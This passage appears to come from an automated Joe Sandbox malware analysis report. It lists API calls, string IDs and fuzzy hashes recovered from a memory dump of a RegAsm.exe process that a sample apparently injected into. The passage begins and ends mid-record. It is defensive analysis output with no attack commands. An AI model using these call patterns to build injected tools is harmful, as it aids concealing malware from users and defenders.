                                                                                                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1127616056-0
                                                                                                                                                                      • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                      • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                      • malloc.MSVCRT ref: 00417459
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                                                      • free.MSVCRT ref: 0041747F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2605342592-0
                                                                                                                                                                      • Opcode ID: eaca81c66f9b3873556ad57409b92193fe76b8735ccf14a8127ccb46f8d17a77
                                                                                                                                                                      • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                      • Opcode Fuzzy Hash: eaca81c66f9b3873556ad57409b92193fe76b8735ccf14a8127ccb46f8d17a77
                                                                                                                                                                      • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2678498856-0
                                                                                                                                                                      • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                      • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                      • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                      • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0040F673
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                      • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                      • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                      • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                      • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                      • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                      • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2754987064-0
                                                                                                                                                                      • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                      • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                      • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                      • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy$CloseHandle
                                                                                                                                                                      • String ID: General
                                                                                                                                                                      • API String ID: 3722638380-26480598
                                                                                                                                                                      • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                      • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 764393265-0
                                                                                                                                                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                      APIs
                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 979780441-0
                                                                                                                                                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                      APIs
                                                                                                                                                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1386444988-0
                                                                                                                                                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                      APIs
                                                                                                                                                                      • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcschr$memcpywcslen
                                                                                                                                                                      • String ID: "
                                                                                                                                                                      • API String ID: 1983396471-123907689
                                                                                                                                                                      • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                      • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                      APIs
                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                      • API String ID: 2789212964-323797159
                                                                                                                                                                      • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                      • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _snwprintf
                                                                                                                                                                      • String ID: %%-%d.%ds
                                                                                                                                                                      • API String ID: 3988819677-2008345750
                                                                                                                                                                      • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                      • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                                                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0040E770
                                                                                                                                                                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSendmemset
                                                                                                                                                                      • String ID: F^@
                                                                                                                                                                      • API String ID: 568519121-3652327722
                                                                                                                                                                      • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                      • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PlacementWindowmemset
                                                                                                                                                                      • String ID: WinPos
                                                                                                                                                                      • API String ID: 4036792311-2823255486
                                                                                                                                                                      • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                      • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                      APIs
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ??3@DeleteObject
                                                                                                                                                                      • String ID: r!A
                                                                                                                                                                      • API String ID: 1103273653-628097481
                                                                                                                                                                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                      APIs
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                      • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                      • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                      • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                      • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                                                                                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                      • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                      APIs
                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                      • free.MSVCRT ref: 0040A908
                                                                                                                                                                      • free.MSVCRT ref: 0040A92B
                                                                                                                                                                      • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                                      • Opcode ID: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                                                                                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                      • Opcode Fuzzy Hash: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                                                                                                                                                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                      APIs
                                                                                                                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                      • free.MSVCRT ref: 0040B201
                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                      • free.MSVCRT ref: 0040B224
                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 726966127-0
                                                                                                                                                                      • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                                                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                      • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                                                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                      APIs
                                                                                                                                                                      • memcmp.MSVCRT ref: 00408AF3
                                                                                                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                      • memcmp.MSVCRT ref: 00408B2B
                                                                                                                                                                      • memcmp.MSVCRT ref: 00408B5C
                                                                                                                                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 231171946-0
                                                                                                                                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                      APIs
                                                                                                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                      • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                      • free.MSVCRT ref: 0040B12C
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3669619086-0
                                                                                                                                                                      • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
